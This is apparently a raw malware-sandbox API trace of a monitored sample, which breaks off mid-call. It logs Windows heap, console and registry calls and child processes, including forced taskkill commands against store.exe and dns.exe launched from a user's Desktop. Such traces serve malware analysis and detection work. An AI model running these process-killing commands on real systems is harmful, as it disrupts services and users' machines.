[0052.899] _errno () returned 0x2d305b0 [0052.899] GetFileType (hFile=0x94) returned 0x2 [0052.899] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0052.899] GetFileType (hFile=0x94) returned 0x2 [0052.899] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x2adfae0 | out: lpMode=0x2adfae0) returned 1 [0052.982] __iob_func () returned 0x77ae2608 [0052.982] __iob_func () returned 0x77ae2608 [0052.982] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0052.982] lstrlenW (lpString="ERROR: Invalid syntax.\nType \"REG ADD /?\" for usage.\n") returned 52 [0052.982] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x1a4c8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x2adfb04, lpReserved=0x0 | out: lpBuffer=0x1a4c8*, lpNumberOfCharsWritten=0x2adfb04*=0x34) returned 1 [0053.012] GetProcessHeap () returned 0x10000 [0053.012] GetProcessHeap () returned 0x10000 [0053.012] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x19640) returned 1 [0053.012] GetProcessHeap () returned 0x10000 [0053.012] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x19640) returned 0x5c [0053.012] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x19640) returned 1 [0053.012] GetProcessHeap () returned 0x10000 [0053.012] GetProcessHeap () returned 0x10000 [0053.012] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x196a8) returned 1 [0053.012] GetProcessHeap () returned 0x10000 [0053.012] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x196a8) returned 0x88 [0053.012] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x196a8) returned 1 [0053.012] GetProcessHeap () returned 0x10000 [0053.012] GetProcessHeap () returned 0x10000 [0053.012] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x17be0) returned 1 [0053.012] GetProcessHeap () returned 0x10000 [0053.012] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x17be0) returned 0x10 [0053.013] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x17be0) returned 1 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x14270) returned 1 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x14270) returned 0x42 [0053.013] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x14270) returned 1 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x1a2c0) returned 1 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x1a2c0) returned 0x200 [0053.013] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x1a2c0) returned 1 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x17b38) returned 1 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x17b38) returned 0x10 [0053.013] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x17b38) returned 1 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x19aa0) returned 1 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x19aa0) returned 0x14 [0053.013] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x19aa0) returned 1 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x19b40) returned 1 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x19b40) returned 0x200 [0053.013] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x19b40) returned 1 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x17aa8) returned 1 [0053.013] GetProcessHeap () returned 0x10000 [0053.013] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x17aa8) returned 0x10 [0053.013] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x17aa8) returned 1 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x19860) returned 1 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x19860) returned 0x14 [0053.014] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x19860) returned 1 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x13fd8) returned 1 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x13fd8) returned 0x6c [0053.014] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x13fd8) returned 1 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x17b08) returned 1 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x17b08) returned 0x10 [0053.014] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x17b08) returned 1 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x14438) returned 1 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x14438) returned 0x14 [0053.014] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x14438) returned 1 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x13bb0) returned 1 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x13bb0) returned 0x1e [0053.014] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x13bb0) returned 1 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x17a90) returned 1 [0053.014] GetProcessHeap () returned 0x10000 [0053.014] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x17a90) returned 0x10 [0053.015] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x17a90) returned 1 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x14418) returned 1 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x14418) returned 0x14 [0053.015] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x14418) returned 1 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x1a4c8) returned 1 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x1a4c8) returned 0x6a [0053.015] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x1a4c8) returned 1 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x14378) returned 1 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x14378) returned 0x14 [0053.015] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x14378) returned 1 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x1a250) returned 1 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x1a250) returned 0x68 [0053.015] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x1a250) returned 1 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x14138) returned 1 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x14138) returned 0x14 [0053.015] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x14138) returned 1 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x14858) returned 1 [0053.015] GetProcessHeap () returned 0x10000 [0053.015] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x14858) returned 0x14 [0053.016] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x14858) returned 1 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x14878) returned 1 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x14878) returned 0x14 [0053.016] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x14878) returned 1 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x17af0) returned 1 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x17af0) returned 0x10 [0053.016] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x17af0) returned 1 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x14898) returned 1 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x14898) returned 0x14 [0053.016] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x14898) returned 1 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x13d18) returned 1 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x13d18) returned 0x14 [0053.016] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x13d18) returned 1 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x13d38) returned 1 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x13d38) returned 0x14 [0053.016] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x13d38) returned 1 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x13d58) returned 1 [0053.016] GetProcessHeap () returned 0x10000 [0053.016] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x13d58) returned 0x14 [0053.016] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x13d58) returned 1 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x17ad8) returned 1 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x17ad8) returned 0x10 [0053.017] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x17ad8) returned 1 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x143f8) returned 1 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x143f8) returned 0x14 [0053.017] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x143f8) returned 1 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x148d8) returned 1 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x148d8) returned 0x14 [0053.017] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x148d8) returned 1 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x13e40) returned 1 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x13e40) returned 0x14 [0053.017] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x13e40) returned 1 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x17bc8) returned 1 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x17bc8) returned 0x10 [0053.017] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x17bc8) returned 1 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x148f8) returned 1 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x148f8) returned 0x14 [0053.017] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x148f8) returned 1 [0053.017] GetProcessHeap () returned 0x10000 [0053.017] GetProcessHeap () returned 0x10000 [0053.018] HeapValidate (hHeap=0x10000, dwFlags=0x0, lpMem=0x17b68) returned 1 [0053.018] GetProcessHeap () returned 0x10000 [0053.018] RtlSizeHeap (HeapHandle=0x10000, Flags=0x0, MemoryPointer=0x17b68) returned 0x10 [0053.018] RtlFreeHeap (HeapHandle=0x10000, Flags=0x0, BaseAddress=0x17b68) returned 1 [0053.018] exit (_Code=1) Thread: id = 49 os_tid = 0x784 Process: id = "12" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7c0d4000" os_pid = "0x7b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x4b0" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 46 os_tid = 0xec4 Thread: id = 47 os_tid = 0xe88 Thread: id = 48 os_tid = 0x9b4 Thread: id = 50 os_tid = 0xd44 Thread: id = 51 os_tid = 0xa80 Process: id = "13" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x9971000" os_pid = "0x42c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x9b0" cmd_line = "taskkill.exe taskkill /f /im store.exe" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 53 os_tid = 0xf64 Thread: id = 56 os_tid = 0x8e8 Thread: id = 58 os_tid = 0x200 Process: id = "14" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x9d5e000" os_pid = "0xcb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb08" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill.exe taskkill /f /im dns.exe" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 54 os_tid = 0xe64 [0054.414] GetModuleHandleA (lpModuleName=0x0) returned 0xdf0000 [0054.414] __set_app_type (_Type=0x1) [0054.414] __p__fmode () returned 0x77ae3c14 [0054.414] __p__commode () returned 0x77ae49ec [0054.414] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe06fd0) returned 0x0 [0054.414] __getmainargs (in: _Argc=0xe1d1a4, _Argv=0xe1d1a8, _Env=0xe1d1ac, _DoWildCard=0, _StartInfo=0xe1d1b8 | out: _Argc=0xe1d1a4, _Argv=0xe1d1a8, _Env=0xe1d1ac) returned 0 [0054.414] _onexit (_Func=0xe08030) returned 0xe08030 [0054.415] _onexit (_Func=0xe08040) returned 0xe08040 [0054.415] _onexit (_Func=0xe08050) returned 0xe08050 [0054.415] _onexit (_Func=0xe08060) returned 0xe08060 [0054.415] _onexit (_Func=0xe08070) returned 0xe08070 [0054.415] _onexit (_Func=0xe08080) returned 0xe08080 [0054.416] GetCurrentThreadId () returned 0xe64 [0054.416] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe64) returned 0xbc [0054.416] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0054.416] GetProcAddress (hModule=0x75e90000, lpProcName="SetThreadUILanguage") returned 0x75ea4f70 [0054.416] SetThreadUILanguage (LangId=0x0) returned 0x870409 [0054.458] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0054.459] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xaffdb0 | out: phkResult=0xaffdb0*=0x0) returned 0x2 [0054.459] VirtualQuery (in: lpAddress=0xaffdbb, lpBuffer=0xaffd68, dwLength=0x1c | out: lpBuffer=0xaffd68*(BaseAddress=0xaff000, AllocationBase=0xa00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.459] VirtualQuery (in: lpAddress=0xa00000, lpBuffer=0xaffd68, dwLength=0x1c | out: lpBuffer=0xaffd68*(BaseAddress=0xa00000, AllocationBase=0xa00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0054.459] VirtualQuery (in: lpAddress=0xa01000, lpBuffer=0xaffd68, dwLength=0x1c | out: lpBuffer=0xaffd68*(BaseAddress=0xa01000, AllocationBase=0xa00000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0054.459] VirtualQuery (in: lpAddress=0xa03000, lpBuffer=0xaffd68, dwLength=0x1c | out: lpBuffer=0xaffd68*(BaseAddress=0xa03000, AllocationBase=0xa00000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.459] VirtualQuery (in: lpAddress=0xb00000, lpBuffer=0xaffd68, dwLength=0x1c | out: lpBuffer=0xaffd68*(BaseAddress=0xb00000, AllocationBase=0xb00000, AllocationProtect=0x4, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.459] GetConsoleOutputCP () returned 0x1b5 [0054.579] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0054.579] SetConsoleCtrlHandler (HandlerRoutine=0xe17260, Add=1) returned 1 [0054.579] _get_osfhandle (_FileHandle=1) returned 0x90 [0054.579] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe2388c | out: lpMode=0xe2388c) returned 1 [0054.734] _get_osfhandle (_FileHandle=0) returned 0x8c [0054.734] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23888 | out: lpMode=0xe23888) returned 1 [0054.757] _get_osfhandle (_FileHandle=1) returned 0x90 [0054.757] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0054.859] _get_osfhandle (_FileHandle=1) returned 0x90 [0054.859] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe23890 | out: lpMode=0xe23890) returned 1 [0054.908] _get_osfhandle (_FileHandle=1) returned 0x90 [0054.908] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0054.931] _get_osfhandle (_FileHandle=0) returned 0x8c [0054.931] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23894 | out: lpMode=0xe23894) returned 1 [0055.040] _get_osfhandle (_FileHandle=0) returned 0x8c [0055.040] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0055.160] GetEnvironmentStringsW () returned 0xb04bc0* [0055.169] GetProcessHeap () returned 0xb00000 [0055.169] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0xaca) returned 0xb05698 [0055.169] FreeEnvironmentStringsA (penv="A") returned 1 [0055.169] GetProcessHeap () returned 0xb00000 [0055.169] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0x4) returned 0xb046a0 [0055.169] GetEnvironmentStringsW () returned 0xb04bc0* [0055.170] GetProcessHeap () returned 0xb00000 [0055.170] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x8, Size=0xaca) returned 0xb06170 [0055.170] FreeEnvironmentStringsA (penv="A") returned 1 [0055.170] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xafed0c | out: phkResult=0xafed0c*=0xcc) returned 0x0 [0055.170] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xafed14, lpData=0xafed18, lpcbData=0xafed10*=0x1000 | out: lpType=0xafed14*=0x0, lpData=0xafed18*=0xc5, lpcbData=0xafed10*=0x1000) returned 0x2 [0055.170] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xafed14, lpData=0xafed18, lpcbData=0xafed10*=0x1000 | out: lpType=0xafed14*=0x4, lpData=0xafed18*=0x1, lpcbData=0xafed10*=0x4) returned 0x0 [0055.170] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xafed14, lpData=0xafed18, lpcbData=0xafed10*=0x1000 | out: lpType=0xafed14*=0x0, lpData=0xafed18*=0x1, lpcbData=0xafed10*=0x1000) returned 0x2 [0055.170] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xafed14, lpData=0xafed18, lpcbData=0xafed10*=0x1000 | out: lpType=0xafed14*=0x4, lpData=0xafed18*=0x0, lpcbData=0xafed10*=0x4) returned 0x0 [0055.170] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xafed14, lpData=0xafed18, lpcbData=0xafed10*=0x1000 | out: lpType=0xafed14*=0x4, lpData=0xafed18*=0x40, lpcbData=0xafed10*=0x4) returned 0x0 [0055.170] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xafed14, lpData=0xafed18, lpcbData=0xafed10*=0x1000 | out: lpType=0xafed14*=0x4, lpData=0xafed18*=0x40, lpcbData=0xafed10*=0x4) returned 0x0 [0055.170] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0xafed14, lpData=0xafed18, lpcbData=0xafed10*=0x1000 | out: lpType=0xafed14*=0x0, lpData=0xafed18*=0x40, lpcbData=0xafed10*=0x1000) returned 0x2 [0055.170] RegCloseKey (hKey=0xcc) returned 0x0 [0055.170] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xafed0c | out: phkResult=0xafed0c*=0xcc) returned 0x0 [0055.170] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xafed14, lpData=0xafed18, lpcbData=0xafed10*=0x1000 | out: lpType=0xafed14*=0x0, lpData=0xafed18*=0x40, lpcbData=0xafed10*=0x1000) returned 0x2 [0055.170] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xafed14, lpData=0xafed18, lpcbData=0xafed10*=0x1000 | out: lpType=0xafed14*=0x4, lpData=0xafed18*=0x1, lpcbData=0xafed10*=0x4) returned 0x0 [0055.170] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xafed14, lpData=0xafed18, lpcbData=0xafed10*=0x1000 | out: lpType=0xafed14*=0x0, lpData=0xafed18*=0x1, lpcbData=0xafed10*=0x1000) returned 0x2 [0055.170] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xafed14, lpData=0xafed18, lpcbData=0xafed10*=0x1000 | out: lpType=0xafed14*=0x4, lpData=0xafed18*=0x0, lpcbData=0xafed10*=0x4) returned 0x0 [0055.170] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xafed14, lpData=0xafed18, lpcbData=0xafed10*=0x1000 | out: lpType=0xafed14*=0x4, lpData=0xafed18*=0x9, lpcbData=0xafed10*=0x4) returned 0x0 [0055.170] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xafed14, lpData=0xafed18, lpcbData=0xafed10*=0x1000 | out: lpType=0xafed14*=0x4, lpData=0xafed18*=0x9, lpcbData=0xafed10*=0x4) returned 0x0 [0055.170] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0xafed14, lpData=0xafed18, lpcbData=0xafed10*=0x1000 | out: lpType=0xafed14*=0x0, lpData=0xafed18*=0x9, lpcbData=0xafed10*=0x1000) returned 